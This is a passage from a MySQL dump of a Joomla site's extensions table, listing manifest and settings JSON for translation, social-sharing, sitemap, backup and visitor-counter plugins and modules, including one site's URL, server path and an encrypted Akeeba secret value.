\",\"group\":\"\",\"filename\":\"mod_gtranslate\"}','{\"moduleclass_sfx\":\"\",\"pro_version\":\"0\",\"enterprise_version\":\"0\",\"method\":\"onfly\",\"look\":\"both\",\"flag_size\":\"16\",\"orientation\":\"h\",\"new_tab\":\"0\",\"analytics\":\"0\",\"language\":\"en\",\"show_af\":\"1\",\"show_sq\":\"1\",\"show_ar\":\"1\",\"show_hy\":\"1\",\"show_az\":\"1\",\"show_eu\":\"1\",\"show_be\":\"1\",\"show_bg\":\"1\",\"show_ca\":\"1\",\"show_zh-CN\":\"1\",\"show_zh-TW\":\"1\",\"show_hr\":\"1\",\"show_cs\":\"1\",\"show_da\":\"1\",\"show_nl\":\"1\",\"show_en\":\"2\",\"show_et\":\"1\",\"show_tl\":\"1\",\"show_fi\":\"1\",\"show_fr\":\"2\",\"show_gl\":\"1\",\"show_ka\":\"1\",\"show_de\":\"2\",\"show_el\":\"1\",\"show_ht\":\"1\",\"show_iw\":\"1\",\"show_hi\":\"1\",\"show_hu\":\"1\",\"show_is\":\"1\",\"show_id\":\"1\",\"show_ga\":\"1\",\"show_it\":\"2\",\"show_ja\":\"1\",\"show_ko\":\"1\",\"show_lv\":\"1\",\"show_lt\":\"1\",\"show_mk\":\"1\",\"show_ms\":\"1\",\"show_mt\":\"1\",\"show_no\":\"1\",\"show_fa\":\"1\",\"show_pl\":\"1\",\"show_pt\":\"2\",\"show_ro\":\"1\",\"show_ru\":\"2\",\"show_sr\":\"1\",\"show_sk\":\"1\",\"show_sl\":\"1\",\"show_es\":\"2\",\"show_sw\":\"1\",\"show_sv\":\"1\",\"show_th\":\"1\",\"show_tr\":\"1\",\"show_uk\":\"1\",\"show_ur\":\"1\",\"show_vi\":\"1\",\"show_cy\":\"1\",\"show_yi\":\"1\",\"show_bn\":\"0\",\"show_bs\":\"0\",\"show_ceb\":\"0\",\"show_eo\":\"0\",\"show_gu\":\"0\",\"show_ha\":\"0\",\"show_hmn\":\"0\",\"show_ig\":\"0\",\"show_jw\":\"0\",\"show_kn\":\"0\",\"show_km\":\"0\",\"show_lo\":\"0\",\"show_la\":\"0\",\"show_mi\":\"0\",\"show_mr\":\"0\",\"show_mn\":\"0\",\"show_ne\":\"0\",\"show_pa\":\"0\",\"show_so\":\"0\",\"show_ta\":\"0\",\"show_te\":\"0\",\"show_yo\":\"0\",\"show_zu\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10158,0,'System - VTEM ImageHover','plugin','vtemimagehover','system',0,1,1,0,'{\"name\":\"System - VTEM ImageHover\",\"type\":\"plugin\",\"creationDate\":\"20\\/12\\/2012\",\"author\":\"Nguyen Van Tuyen\",\"copyright\":\"Copyright (C) 2010 VTEM. All rights reserved.\",\"authorEmail\":\"tuyen0110@gmail.com\",\"authorUrl\":\"www.vtem.net\",\"version\":\"1.0\",\"description\":\"\\n\\t\\t<style type=\\\"text\\/css\\\">\\n\\t\\t\\tspan.readonly { padding: 10px; font-family: Arial; font-size:13px !important; font-weight: normal !important; text-align: justify; color: #4d4d4d; line-height: 24px; }\\n\\t\\t\\tspan.readonly h1 { clear:both; font-family: Georgia, sans-serif; font-size:38px; margin:5px 5px 23px; padding:0px 0px 24px 0px; color:#333; border-bottom: 1px solid #eee; font-weight: normal; }\\n\\t\\t<\\/style>\\t\\t\\n\\t\\t<span class=\\\"readonly\\\"><h1>VTEM ImageHover<\\/h1><p>It effect on images when you take mouse over the images, it really good style effect of jquery mouse over. It makes for a pretty slick effect which could be used on thumbnails. I thought I\\u2019d share this and maybe some of you can find it useful.<\\/p>\\n\\t\\t<div><b>Basic:<\\/b><br>\\n\\t\\t{vtemimagehover images=[images\\/01.jpg; images\\/02.jpg]} \\n\\t\\t<br\\/><b>Add your links:<\\/b><br\\/>\\n\\t\\t{vtemimagehover images=[images\\/01.jpg; images\\/02.jpg] links=[http:\\/\\/vtem.net; http:\\/\\/prestaddon.com]} \\n\\t\\t<br\\/><b>Use with LightBox:<\\/b><br\\/>\\n\\t\\t{vtemimagehover images=[images\\/thumb1.jpg; images\\/thumb2.jpg] links=[images\\/big1.jpg; images\\/big2.jpg] captions=[Title1; Title2] lightBox=[1]} \\n\\t\\t<\\/div>\\n\\t\\t<br>\\n\\t\\t<p>Find out more about our modules: <a target=\\\"_blank\\\" href=\\\"http:\\/\\/vtem.net\\/extensions.html\\\">http:\\/\\/vtem.net\\/extensions.html<\\/a><\\/p><p>If you feel comfortable with this extension, <a target=\\\"_blank\\\" href=\\\"http:\\/\\/extensions.joomla.org\\/extensions\\/photos-a-images\\/images\\/articles-images\\/23142\\\">Please vote on the JED for the extension!<\\/a><\\/p><\\/span>\\n\\t\\t\",\"group\":\"\",\"filename\":\"vtemimagehover\"}','{\"startEffect\":\"transparent\",\"hoverEffect\":\"popout\",\"animSpeed\":\"240\",\"imageOpacity\":\"0.8\",\"script\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10159,0,'SME Facebook Like Box Sidebar','module','mod_smefacebooklikeboxsidebar','',0,1,0,0,'{\"name\":\"SME Facebook Like Box Sidebar\",\"type\":\"module\",\"creationDate\":\"October, 2013\",\"author\":\"John Steel\",\"copyright\":\"All rights reserved by Social Media Extensions\",\"authorEmail\":\"admin@socialmediaextensions.com\",\"authorUrl\":\"http:\\/\\/www.socialmediaextensions.com\\/\",\"version\":\"1.0\",\"description\":\"Thanks for installing SME Facebook Like Box Sidebar\",\"group\":\"\",\"filename\":\"mod_smeFacebookLikeBoxSidebar\"}','{\"sidebarImage\":\"ficon1\",\"marginTop\":\"100\",\"jQuery\":\"1\",\"pageURL\":\"https:\\/\\/www.facebook.com\\/facebook\",\"connection\":\"10\",\"width\":\"292\",\"height\":\"590\",\"streams\":\"true\",\"color_scheme\":\"light\",\"show_faces\":\"true\",\"header\":\"true\",\"border\":\"true\",\"moduleclass_sfx\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10161,0,'Content - BT Social Share','plugin','bt_socialshare','content',0,1,1,0,'{\"name\":\"Content - BT Social Share\",\"type\":\"plugin\",\"creationDate\":\"Oct 2011\",\"author\":\"BowThemes.com\",\"copyright\":\"Copyright (C) 2012 BowThemes.com. All rights reserved.\",\"authorEmail\":\"support@BowThemes.com\",\"authorUrl\":\"http:\\/\\/www.BowThemes.com\\/\",\"version\":\"2.3.6\",\"description\":\"\\n\\t\\t<div class=\\\"bt_description\\\">\\n\\t\\t\\t<h3>BT Social Share Plugin Version 2.3.6<\\/h3>\\t\\t\\t\\n\\t\\t\\t<a href=\\\"http:\\/\\/bowthemes.com\\\" target=\\\"_blank\\\"><img src=\\\"..\\/plugins\\/content\\/bt_socialshare\\/admin\\/images\\/bt-social-share.png\\\"><\\/a>\\n\\t\\t\\t<p>BT Social Share plugin adds all major Social Networks into your Joomla articles. Plugin can be published at various locations in content, with 2 options display top or bottom of article. Plugin has backend settings where you can customise it. You can enable\\/disable each social network individually or show or hide them on specific sections, categories, individual articles or specific menus. \\n\\t\\t\\t<\\/p>\\n\\t\\t\\t<br clear=\\\"both\\\" \\/>\\n\\t\\t\\t<h3>Integrating External Code<\\/h3>\\n\\t\\t\\t <pre style=\\\"width:500px;height:150px;\\\">&lt;?php \\n\\tJPluginHelper::importPlugin(\'content\');\\n\\t$share = plgContentBt_socialshare::socialButtons();\\n\\techo $share[\'script\']; \\/\\/ Required\\n\\techo $share[\'buttons\']; \\/\\/ Social button\\n\\techo $share[\'recommend\']; \\/\\/ Recommendation bar\\n\\techo $share[\'comment\']; \\/\\/ facebook comment box\\n?&gt;<\\/pre>\\n\\t\\t\\t<br clear=\\\"both\\\" \\/>\\n\\t\\n\\t\\t\\t<h3>Features<\\/h3>\\n\\t\\t\\t<ul class=\\\"list-style\\\">\\n\\t\\t\\t\\t<li>Facebook Share<\\/li>\\n\\t\\t\\t\\t<li>Facebook Recommendations Bar<\\/li>\\n\\t\\t\\t\\t<li>Facebook Like (Send button)<\\/li>\\n\\t\\t\\t\\t<li>Facebook Comment(Auto width)<\\/li>\\n\\t\\t\\t\\t<li>Twitter Oficial Button<\\/li>\\n\\t\\t\\t\\t<li>TweetMe<\\/li>\\n\\t\\t\\t\\t<li>LinkedIn Share<\\/li>\\n\\t\\t\\t\\t<li>Google +1<\\/li>\\n\\t\\t\\t\\t<li>StumbleUpon<\\/li>\\n\\t\\t\\t\\t<li>Digg<\\/li>\\n\\t\\t\\t\\t<li>Position display in content options (Top\\/bottom\\/left\\/right)<\\/li>\\n\\t\\t\\t\\t<li>Option to display different for the various Joomla layouts (Archived Articles, Single Article, Category Blog and Featured Articles)<\\/li>\\n\\t\\t\\t\\t<li>Support K2 Component<\\/li>\\n\\t\\t\\t\\n\\t\\t\\t<\\/ul>\\n\\t\\t\\t<h3>UPgrade versions<\\/h3>\\n\\t\\t\\t<p>\\n\\t\\t\\t\\tYour current versions is 2.3.6. <a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/bt-social-plugin.html\\\">Find our latest versions now<\\/a>\\n\\t\\t\\t<\\/p>\\n\\t\\t\\t<h3>Userful links<\\/h3>\\n\\t\\t\\t<ul>\\n\\t\\t\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/bt-social-plugin.html\\\">Video tutorials<\\/a><\\/li>\\n\\t\\t\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/forums\\/12-bt-social-sharing-plugin\\/\\\">Report bug<\\/a><\\/li>\\n\\t\\t\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/forums\\/12-bt-social-sharing-plugin\\/\\\">Forum support<\\/a><\\/li>\\n\\t\\t\\t<\\/ul>\\n\\t\\t\\t<h3>About bow themes & copyright<\\/h3>\\t\\n\\t\\t\\t<p>\\n\\t\\t\\t\\tBow Themes is Professional Joomla template provider. We are focused on creating unique, attractive and clean templates without loosing flexibility and simplicity of customization\\n\\t\\t\\t<\\/p>\\n\\t\\t\\tCopyright (C) 2012 BowThemes\\t\\n\\n\\t\\t<\\/div>\\n\\t\\t<style>\\n\\t\\t\\t.bt_description{\\n\\t\\t\\t\\ttext-align: left;\\n\\t\\t\\t}\\n\\t\\t\\t.bt_description h3{\\n\\t\\t\\t\\ttext-transform: uppercase;\\n\\t\\t\\t\\tmargin: 20px 0px 10px 0px;\\n\\t\\t\\t}\\n\\t\\t\\t.bt_description img{\\n\\t\\t\\t\\tfloat:left;\\n\\t\\t\\t\\tmargin:5px 10px 5px 0px;\\n\\t\\t\\t}\\n\\t\\t\\t.bt_description p,.bt_description li{\\n\\t\\t\\t\\tpadding: 5px 5px 5px 30px;\\t\\n\\t\\t\\t\\tlist-style: none outside none;\\t\\t\\n\\t\\t\\t}\\n\\t\\t\\t\\n\\t\\t\\t.bt_description ul.list-style li{\\n\\t\\t\\t\\tbackground:url(..\\/plugins\\/content\\/bt_socialshare\\/admin\\/images\\/tick.png) 0px 6px no-repeat;\\n\\t\\t\\t\\tpadding-left:30px;\\n\\t\\t\\t\\tline-height:15px;\\n\\t\\t\\t}\\n\\t\\t<\\/style>\\n\\t\\t\",\"group\":\"\",\"filename\":\"bt_socialshare\"}','{\"facebook_share_button\":\"1\",\"facebook_share_button_type\":\"\",\"facebook_like\":\"1\",\"facebook_sendbutton\":\"0\",\"facebook_like_type\":\"button_count\",\"facebook_like_width\":\"70\",\"facebook_showface\":\"1\",\"facebook_like_font\":\"arial\",\"facebook_like_color\":\"light\",\"facebook_like_action\":\"like\",\"facebook_comment\":\"0\",\"facebook_comment_numberpost\":\"5\",\"facebook_comment_width\":\"auto\",\"facebook_comment_color_schema\":\"light\",\"show_cm_count\":\"1\",\"mail_to\":\"\",\"mail_subject\":\"New comment at \\\"[TITLE]\\\"\",\"mail_message\":\"Please check here: [LINK]\",\"facebook_recommendation\":\"1\",\"facebook_trigger\":\"onvisible\",\"facebook_recommendation_time\":\"30\",\"num_recommendations\":\"2\",\"facebook_recommendation_side\":\"right\",\"facebook_html5\":\"0\",\"facebook_api_id\":\"\",\"facebook_admins\":\"\",\"twitter\":\"1\",\"twitter_name\":\"BowThemes\",\"twitter_counter\":\"horizontal\",\"twitter_size\":\"medium\",\"twitter_width\":\"80\",\"linkedin\":\"0\",\"linkedIn_type\":\"right\",\"linkedIn_showzero\":\"0\",\"google_plus\":\"1\",\"google_plus_annotation\":\"bubble\",\"google_plus_width\":\"\",\"google_plus_type\":\"20\",\"google_plus_use_html5\":\"0\",\"google_plus_asynchronous\":\"0\",\"google_plus_parse_tags\":\"onload\",\"stumble\":\"0\",\"stumble_type\":\"1\",\"digg\":\"0\",\"digg_type\":\"DiggCompact\",\"button-pretext\":\"\",\"comment-pretext\":\"\",\"show_plugin_in\":[\"article\"],\"positions\":[\"above\"],\"k2-positions\":[\"after-title\"],\"og_meta\":\"1\",\"og_title\":\"1\",\"excluding_article\":\"\",\"excluding_k2_article\":\"\",\"fb_excluding_article\":\"\",\"fb_excluding_k2_article\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10163,0,'com_xmap','component','com_xmap','',1,1,0,0,'{\"name\":\"com_xmap\",\"type\":\"component\",\"creationDate\":\"2011-04-10\",\"author\":\"Guillermo Vargas\",\"copyright\":\"This component is released under the GNU\\/GPL License\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"http:\\/\\/joomla.vargas.co.cr\",\"version\":\"2.3.2\",\"description\":\"Xmap - Sitemap Generator for Joomla!\",\"group\":\"\",\"filename\":\"manifest\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10164,0,'Xmap - Content Plugin','plugin','com_content','xmap',0,1,1,0,'{\"name\":\"Xmap - Content Plugin\",\"type\":\"plugin\",\"creationDate\":\"01\\/26\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.4\",\"description\":\"Add support for articles and categories on Joomla 1.6 or newer\",\"group\":\"\",\"filename\":\"com_content\"}','{\"expand_categories\":\"1\",\"expand_featured\":\"1\",\"include_archived\":\"2\",\"show_unauth\":\"0\",\"add_pagebreaks\":\"1\",\"max_art\":\"0\",\"max_art_age\":\"0\",\"add_images\":\"0\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"art_priority\":\"-1\",\"art_changefreq\":\"-1\",\"keywords\":\"metakey\"}','','',0,'0000-00-00 00:00:00',0,0),(10165,0,'Xmap - Kunena Plugin','plugin','com_kunena','xmap',0,1,1,0,'{\"name\":\"Xmap - Kunena Plugin\",\"type\":\"plugin\",\"creationDate\":\"September 2007\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.3\",\"description\":\"Xmap Plugin for Kunena component\",\"group\":\"\",\"filename\":\"com_kunena\"}','{\"include_topics\":\"1\",\"max_topics\":\"\",\"max_age\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"topic_priority\":\"-1\",\"topic_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10166,0,'Xmap - SobiPro Plugin','plugin','com_sobipro','xmap',0,1,1,0,'{\"name\":\"Xmap - SobiPro Plugin\",\"type\":\"plugin\",\"creationDate\":\"07\\/15\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.2\",\"description\":\"Xmap Plugin for SobiPro component\",\"group\":\"\",\"filename\":\"com_sobipro\"}','{\"include_entries\":\"1\",\"max_entries\":\"\",\"max_age\":\"\",\"entries_order\":\"b.position\",\"entries_orderdir\":\"DESC\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"weekly\",\"entry_priority\":\"-1\",\"entry_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10167,0,'Xmap - Mosets Tree Plugin','plugin','com_mtree','xmap',0,1,1,0,'{\"name\":\"Xmap - Mosets Tree Plugin\",\"type\":\"plugin\",\"creationDate\":\"07\\/20\\/2011\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.2\",\"description\":\"XMAP_MTREE_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_mtree\"}','{\"cats_order\":\"cat_name\",\"cats_orderdir\":\"ASC\",\"include_links\":\"1\",\"links_order\":\"ordering\",\"entries_orderdir\":\"ASC\",\"max_links\":\"\",\"max_age\":\"\",\"cat_priority\":\"0.5\",\"cat_changefreq\":\"weekly\",\"link_priority\":\"0.5\",\"link_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10168,0,'Xmap - Virtuemart Plugin','plugin','com_virtuemart','xmap',0,1,1,0,'{\"name\":\"Xmap - Virtuemart Plugin\",\"type\":\"plugin\",\"creationDate\":\"January 2012\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.1\",\"description\":\"XMAP_VM_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_virtuemart\"}','{\"include_products\":\"1\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"prod_priority\":\"-1\",\"prod_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10169,0,'Xmap - WebLinks Plugin','plugin','com_weblinks','xmap',0,1,1,0,'{\"name\":\"Xmap - WebLinks Plugin\",\"type\":\"plugin\",\"creationDate\":\"Apr 2004\",\"author\":\"Guillermo Vargas\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"guille@vargas.co.cr\",\"authorUrl\":\"joomla.vargas.co.cr\",\"version\":\"2.0.1\",\"description\":\"XMAP_WL_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_weblinks\"}','{\"include_links\":\"1\",\"max_links\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"link_priority\":\"-1\",\"link_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10170,0,'Xmap Package','package','pkg_xmap','',0,1,1,0,'{\"name\":\"Xmap Package\",\"type\":\"package\",\"creationDate\":\"Unknown\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.0.0\",\"description\":\"The Site Map generator for Joomla!\",\"group\":\"\",\"filename\":\"pkg_xmap\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10174,0,'noextlinks','plugin','noextlinks','system',0,1,1,0,'{\"name\":\"noextlinks\",\"type\":\"plugin\",\"creationDate\":\"2017-05-30\",\"author\":\"Buyanov Danila\",\"copyright\":\"Copyright (C) 2005 - 2017 Buyanov Danila. All rights reserved.\",\"authorEmail\":\"info@saity74.ru\",\"authorUrl\":\"www.saity74.ru\",\"version\":\"1.8.5\",\"description\":\"PLG_NOEXTLINKS_DESC\",\"group\":\"\",\"filename\":\"noextlinks\"}','{\"noindex\":\"1\",\"nofollow\":\"1\",\"settitle\":\"1\",\"blank\":\"_blank\",\"usejs\":\"0\",\"whitelist\":\"\",\"excluded_menu_items\":\"\",\"excluded_articles\":\"\",\"excluded_categories\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10176,10208,'Akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.5.1\",\"description\":\"Akeeba Backup Core - Full Joomla! site backup solution, Core Edition.\",\"group\":\"\",\"filename\":\"akeeba\"}','{\"confwiz_upgrade\":1,\"siteurl\":\"https:\\/\\/malehus.in.ua\\/\",\"jlibrariesdir\":\"\\/sata2\\/home\\/users\\/malehus\\/www\\/www.malehus.in.ua\\/libraries\",\"jversion\":\"1.6\",\"updatedb\":null,\"frontend_secret_word\":\"###AES128###9Oc+uentKL+\\/BkYknXtyvUpQU1TjlhS4ZhIp1owkX3edxNasijt+EkBcOJqMjK5U+sY0aJ7YXPWh20NxdckZqv6xldupcFmK7lIrzDh6NAS29pvASlBJVkVAZS4h5W\\/6CMCiuK298DsAAAAA\",\"show_howtorestoremodal\":0}','','',0,'0000-00-00 00:00:00',0,0),(10178,0,'AkeebaStrapper','file','AkeebaStrapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"2016-05-12\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"revAA17947\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10179,0,'akeebabackup - ru-RU','file','akeebabackup-ru-RU','',0,1,0,0,'{\"name\":\"akeebabackup - ru-RU\",\"type\":\"file\",\"creationDate\":\"22 Dec 2015\",\"author\":\"AkeebaBackup.com\",\"copyright\":\"Copyright (C)2015 AkeebaBackup.com. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"\\/Users\\/nikosdion\\/Projects\\/akeeba\\/backup\\/build\\/..\",\"description\":\"Russian (Russia) translation file for Akeeba Backup\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10180,0,'plg_installer_webinstaller','plugin','webinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"28 April 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.1.2\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"webinstaller\"}','{\"tab_position\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10186,0,'System - ZT Visitor Counter plugin','plugin','zt_visitor_counter','system',0,1,1,0,'{\"name\":\"System - ZT Visitor Counter plugin\",\"type\":\"plugin\",\"creationDate\":\"March 2013\",\"author\":\"ZooTemplate\",\"copyright\":\"Copyright (C) 2008 - 2013 http:\\/\\/www.ZooTemplate.com. All rights reserved.\",\"authorEmail\":\"support@ZooTemplate.com\",\"authorUrl\":\"www.ZooTemplate.com\",\"version\":\"1.0.1\",\"description\":\"This ZT Visitor Counter plugin must be enabled to work with ZT Visitor Counter module\",\"group\":\"\",\"filename\":\"zt_visitor_counter\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10187,0,'ZT Visitor Counter module','module','mod_zt_visitor_counter','',0,1,0,0,'{\"name\":\"ZT Visitor Counter module\",\"type\":\"module\",\"creationDate\":\"March, 2013\",\"author\":\"ZooTemplate\",\"copyright\":\"Copyright (C) 2008 - 2013 http:\\/\\/www.ZooTemplate.com. All rights reserved.\",\"authorEmail\":\"support@ZooTemplate.com\",\"authorUrl\":\"www.ZooTemplate.com\",\"version\":\"1.0.1\",\"description\":\"ZT_VISITOR_COUNTER_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_zt_visitor_counter\"}','{\"moduleclass_sfx\":\"\",\"width\":\"100\",\"digit_style\":\"default\",\"module_style\":\"default\",\"showDigit\":\"1\",\"minDigits\":\"7\",\"showIcons\":\"1\",\"showTitles\":\"1\",\"showTotals\":\"1\",\"showIp\":\"Your IP:\",\"showOnline\":\"1\",\"showAgent\":\"1\",\"duration\":\"15\",\"showGuestOnline\":\"1\",\"showMemberOnline\":\"1\",\"showAllOnline\":\"1\",\"initialValue\":\"0\",\"today\":\"Today\",\"yesterday\":\"Yesterday\",\"thisWeek\":\"This Week\",\"lastWeek\":\"Last Week\",\"thisMonth\":\"This Month\",\"lastMonth\":\"Last Month\",\"all\":\"All days\",\"foreCast\":\"Forecast Today\",\"firstDay\":\"0\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"zt-copyright\":\"ICAgIDxkaXYgY2xhc3M9Inp0dmMtY29weXJpZ2h0Ij48YSBocmVmPSJodHRwOi8vd3d3Lnpvb3RlbXBsYXRlLmNvbS8iIHRpdGxlPSJWaXNpdG9yIENvdW50ZXIiIHRhcmdldD0iX2JsYW5rIj5WaXNpdG9yDQogICAgICAgICAgICBDb3VudGVyPC9hPjwvZGl2Pg0KPC9kaXY+\"}','','',0,'0000-00-00 00:00:00',0,0),(10188,0,'ZT Visitor Counter package','package','pkg_zt_visitor_counter','',0,1,1,0,'{\"name\":\"ZT Visitor Counter package\",\"type\":\"package\",\"creationDate\":\"March, 2013\",\"author\":\"ZooTemplate\",\"copyright\":\"Copyright (C) 2008 - 2013 http:\\/\\/www.ZooTemplate.com. All rights reserved.\",\"authorEmail\":\"support@ZooTemplate.com\",\"authorUrl\":\"www.ZooTemplate.com\",\"version\":\"1.0.1\",\"description\":\"The simple visitor counter module and plugin for Joomla! 2.5 and Joomla! 3.0. Get more great extensions\\n        for Joomla! 2.5.x and Joomla! 3.x at ZooTemplate.\\n    \",\"group\":\"\",\"filename\":\"pkg_zt_visitor_counter\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10190,10208,'plg_quickicon_akeebabackup','plugin','akeebabackup','quickicon',0,0,1,0,'{\"name\":\"plg_quickicon_akeebabackup\",\"type\":\"plugin\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.5.1\",\"description\":\"PLG_QUICKICON_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{\"context\":\"mod_quickicon\",\"enablewarning\":\"1\",\"warnfailed\":\"1\",\"maxbackupperiod\":\"24\",\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10191,10208,'PLG_SYSTEM_AKEEBAUPDATECHECK','plugin','akeebaupdatecheck','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_AKEEBAUPDATECHECK\",\"type\":\"plugin\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.5.1\",\"description\":\"PLG_AKEEBAUPDATECHECK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebaupdatecheck\"}','{\"email\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10192,10208,'PLG_SYSTEM_BACKUPONUPDATE','plugin','backuponupdate','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_BACKUPONUPDATE\",\"type\":\"plugin\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.5.1\",\"description\":\"PLG_SYSTEM_BACKUPONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"backuponupdate\"}','{\"profileid\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10199,0,'PLG_SYSTEM_REGULARLABS','plugin','regularlabs','system',0,1,1,0,'{\"name\":\"PLG_SYSTEM_REGULARLABS\",\"type\":\"plugin\",\"creationDate\":\"May 2021\",\"author\":\"Regular Labs (Peter van Westen)\",\"copyright\":\"Copyright \\u00a9 2021 Regular Labs - All Rights Reserved\",\"authorEmail\":\"info@regularlabs.com\",\"authorUrl\":\"https:\\/\\/regularlabs.com\",\"version\":\"21.5.22934\",\"description\":\"PLG_SYSTEM_REGULARLABS_DESC\",\"group\":\"\",\"filename\":\"regularlabs\"}','{\"combine_admin_menu\":\"0\",\"max_list_count\":\"2500\"}','','',0,'0000-00-00 00:00:00',0,0),(10200,0,'F0F (NEW) DO NOT REMOVE','library','lib_f0f','',0,1,1,0,'{\"name\":\"F0F (NEW) DO NOT REMOVE\",\"type\":\"library\",\"creationDate\":\"2016-05-12\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"revAA17947\",\"description\":\"Framework-on-Framework (FOF) newer version - DO NOT REMOVE - The rapid component development framework for Joomla!. This package is the newer version of FOF, not the one shipped with Joomla! as the official Joomla! RAD Layer. The Joomla! RAD Layer has ceased development in March 2014. DO NOT UNINSTALL THIS PACKAGE, IT IS *** N O T *** A DUPLICATE OF THE \'FOF\' PACKAGE. REMOVING EITHER FOF PACKAGE WILL BREAK YOUR 